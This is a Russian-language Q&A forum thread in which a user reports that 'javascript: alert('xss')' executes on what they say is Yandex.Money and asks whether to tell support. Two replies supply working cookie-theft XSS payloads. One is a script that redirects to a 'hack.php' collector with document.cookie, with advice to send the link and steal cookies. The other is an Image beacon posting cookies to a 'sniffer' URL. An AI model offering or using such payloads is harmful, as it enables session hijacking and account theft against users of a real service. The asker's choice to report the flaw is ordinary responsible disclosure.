Как проверить XSS уязвимость?

Выполняется: javascript: alert('xss')

Опасно? Стоит писать саппорту или пошлют меня?
  • Вопрос задан
  • 6461 просмотр
Пригласить эксперта
Ответы на вопрос 5
@Nimor Автор вопроса
Отписал в поддержку Яндекса, в общем все равно что-то да выполняется, это же плохо.
Ответ написан
Комментировать
int03e
@int03e
Выполняется в GET запросе? Подставляем вместо алерта
<script>
document.location="http://yoursite.com/hack.php?cookie=" + document.cookie;document.location="http://www.site.com"
</script>

Где hack.php — наш простенький скрипт по сохранению кукисов. Шлем ссылку, угоняем куки.
Ответ написан
@Nimor Автор вопроса
"<" and ">" запрещены. Это опять на yandex-money. Зато "<" and ">" работают в поле javascript: alert('< >')
Ответ написан
Комментировать
barmaley_exe
@barmaley_exe
Если у Вас выполняется alert('xss'), то и какой-нибудь
var t=new Image();t.src='http://google.com/sniffer/?'+document.cookie;
Должен выполниться.
Ответ написан
Комментировать
@Nimor Автор вопроса
Понятно, я не знаю что такое sniffer, это опасно или нет?
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы